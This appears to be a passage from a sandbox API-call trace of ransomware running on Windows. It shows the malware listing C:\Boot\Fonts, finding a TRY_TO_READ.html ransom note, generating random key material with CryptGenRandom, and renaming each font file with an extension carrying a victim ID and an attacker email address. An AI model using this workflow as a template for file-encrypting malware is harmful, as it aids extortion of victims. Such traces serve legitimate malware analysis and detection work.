	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a5418 | out: hHeap=0x540000) returned 1
	[0051.996] FindFirstFileW (in: lpFileName="C:\\\\Boot\\Fonts\\*", lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x575320
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.996] GetLastError () returned 0x6
	[0051.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575360
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575360 | out: hHeap=0x540000) returned 1
	[0051.996] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.996] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.996] FindNextFileW (in: hFindFile=0x575320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xc9c8a490, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.997] GetLastError () returned 0x6
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x4c) returned 0x58b6d8
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x58b6d8 | out: hHeap=0x540000) returned 1
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x34) returned 0x575360
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x575360 | out: hHeap=0x540000) returned 1
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x56ecd8
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x56ecd8 | out: hHeap=0x540000) returned 1
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.997] FindNextFileW (in: hFindFile=0x575320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x64c5ad69, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x385e00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chs_boot.ttf", cAlternateFileName="")) returned 1
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.997] GetLastError () returned 0x6
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584738 | out: hHeap=0x540000) returned 1
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584738
	[0051.997] FindNextFileW (in: hFindFile=0x575320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac191e00, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac191e00, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6505f253, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x3b27a4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="cht_boot.ttf", cAlternateFileName="")) returned 1
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.997] GetLastError () returned 0x6
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.997] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.997] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0051.998] FindNextFileW (in: hFindFile=0x575320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac204220, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac204220, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65274577, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x1e46e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="jpn_boot.ttf", cAlternateFileName="")) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.998] GetLastError () returned 0x6
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0051.998] FindNextFileW (in: hFindFile=0x575320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac22a380, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac22a380, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x6530caef, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0x242f20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="kor_boot.ttf", cAlternateFileName="")) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.998] GetLastError () returned 0x6
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5847c8
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5847c8 | out: hHeap=0x540000) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5847c8
	[0051.998] FindNextFileW (in: hFindFile=0x575320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc9c64330, ftCreationTime.dwHighDateTime=0x1d5956c, ftLastAccessTime.dwLowDateTime=0xc9c64330, ftLastAccessTime.dwHighDateTime=0x1d5956c, ftLastWriteTime.dwLowDateTime=0xc9c8a490, ftLastWriteTime.dwHighDateTime=0x1d5956c, nFileSizeHigh=0x0, nFileSizeLow=0x5bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1
	[0051.998] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.998] GetLastError () returned 0x6
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583b10
	[0051.998] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584810
	[0051.999] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584810 | out: hHeap=0x540000) returned 1
	[0051.999] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583b10 | out: hHeap=0x540000) returned 1
	[0051.999] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.999] FindNextFileW (in: hFindFile=0x575320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 1
	[0051.999] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584660 | out: hHeap=0x540000) returned 1
	[0051.999] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584660
	[0051.999] GetLastError () returned 0x6
	[0051.999] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x20) returned 0x5a53f0
	[0051.999] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x30) returned 0x583a30
	[0051.999] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584810
	[0051.999] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584810 | out: hHeap=0x540000) returned 1
	[0051.999] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x583a30 | out: hHeap=0x540000) returned 1
	[0051.999] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5a53f0 | out: hHeap=0x540000) returned 1
	[0051.999] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584810
	[0051.999] FindNextFileW (in: hFindFile=0x575320, lpFindFileData=0x3a1f8e0 | out: lpFindFileData=0x3a1f8e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac276640, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac276640, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x65332c4d, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xb95c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="wgl4_boot.ttf", cAlternateFileName="WGL4_B~1.TTF")) returned 0
	[0051.999] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584858
	[0051.999] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b6888
	[0051.999] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596610
	[0051.999] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b6888 | out: pbBuffer=0x5b6888) returned 1
	[0051.999] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596610 | out: pbBuffer=0x596610) returned 1
	[0051.999] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", dwFileAttributes=0x80) returned 0
	[0052.000] lstrlenW (lpString="C:\\\\Boot\\Fonts\\wgl4_boot.ttf") returned 28
	[0052.000] GetProcessHeap () returned 0x540000
	[0052.000] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9e) returned 0x5832a8
	[0052.000] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf") returned="C:\\\\Boot\\Fonts\\wgl4_boot.ttf"
	[0052.000] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.000] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.000] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.000] GetProcessHeap () returned 0x540000
	[0052.000] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.000] CloseHandle (hObject=0xffffffff) returned 0
	[0052.000] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584858 | out: hHeap=0x540000) returned 1
	[0052.000] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584810 | out: hHeap=0x540000) returned 1
	[0052.000] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584810
	[0052.000] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b6990
	[0052.000] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596620
	[0052.000] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b6990 | out: pbBuffer=0x5b6990) returned 1
	[0052.000] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596620 | out: pbBuffer=0x596620) returned 1
	[0052.000] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf", dwFileAttributes=0x80) returned 0
	[0052.000] lstrlenW (lpString="C:\\\\Boot\\Fonts\\kor_boot.ttf") returned 27
	[0052.001] GetProcessHeap () returned 0x540000
	[0052.001] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9c) returned 0x5832a8
	[0052.001] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\Fonts\\kor_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf") returned="C:\\\\Boot\\Fonts\\kor_boot.ttf"
	[0052.001] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.001] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf" (normalized: "c:\\boot\\fonts\\kor_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.001] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\kor_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.001] GetProcessHeap () returned 0x540000
	[0052.001] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.001] CloseHandle (hObject=0xffffffff) returned 0
	[0052.001] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584810 | out: hHeap=0x540000) returned 1
	[0052.001] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5847c8 | out: hHeap=0x540000) returned 1
	[0052.001] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5847c8
	[0052.001] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b6a98
	[0052.001] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596630
	[0052.001] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b6a98 | out: pbBuffer=0x5b6a98) returned 1
	[0052.001] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596630 | out: pbBuffer=0x596630) returned 1
	[0052.001] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf", dwFileAttributes=0x80) returned 0
	[0052.001] lstrlenW (lpString="C:\\\\Boot\\Fonts\\jpn_boot.ttf") returned 27
	[0052.001] GetProcessHeap () returned 0x540000
	[0052.001] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9c) returned 0x5832a8
	[0052.001] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\Fonts\\jpn_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf") returned="C:\\\\Boot\\Fonts\\jpn_boot.ttf"
	[0052.001] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.001] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.001] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\jpn_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.002] GetProcessHeap () returned 0x540000
	[0052.002] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.002] CloseHandle (hObject=0xffffffff) returned 0
	[0052.002] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5847c8 | out: hHeap=0x540000) returned 1
	[0052.002] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0052.002] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x584780
	[0052.002] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b6ba0
	[0052.002] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596640
	[0052.002] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b6ba0 | out: pbBuffer=0x5b6ba0) returned 1
	[0052.002] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596640 | out: pbBuffer=0x596640) returned 1
	[0052.002] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf", dwFileAttributes=0x80) returned 0
	[0052.002] lstrlenW (lpString="C:\\\\Boot\\Fonts\\cht_boot.ttf") returned 27
	[0052.002] GetProcessHeap () returned 0x540000
	[0052.002] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9c) returned 0x5832a8
	[0052.002] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\Fonts\\cht_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf") returned="C:\\\\Boot\\Fonts\\cht_boot.ttf"
	[0052.002] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.002] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
	[0052.002] CreateFileW (lpFileName="C:\\\\Boot\\Fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff
	[0052.002] GetProcessHeap () returned 0x540000
	[0052.002] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5832a8 | out: hHeap=0x540000) returned 1
	[0052.002] CloseHandle (hObject=0xffffffff) returned 0
	[0052.002] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x584780 | out: hHeap=0x540000) returned 1
	[0052.002] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5846a8 | out: hHeap=0x540000) returned 1
	[0052.002] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x40) returned 0x5846a8
	[0052.002] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b6ca8
	[0052.002] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x596650
	[0052.002] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b6ca8 | out: pbBuffer=0x5b6ca8) returned 1
	[0052.003] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x596650 | out: pbBuffer=0x596650) returned 1
	[0052.003] SetFileAttributesW (lpFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf", dwFileAttributes=0x80) returned 0
	[0052.003] lstrlenW (lpString="C:\\\\Boot\\Fonts\\chs_boot.ttf") returned 27
	[0052.003] GetProcessHeap () returned 0x540000
	[0052.003] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x9c) returned 0x5832a8
	[0052.003] lstrcpyW (in: lpString1=0x5832a8, lpString2="C:\\\\Boot\\Fonts\\chs_boot.ttf" | out: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf") returned="C:\\\\Boot\\Fonts\\chs_boot.ttf"
	[0052.003] lstrcatW (in: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR"
	[0052.003] MoveFileExW (lpExistingFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\\\Boot\\Fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 0
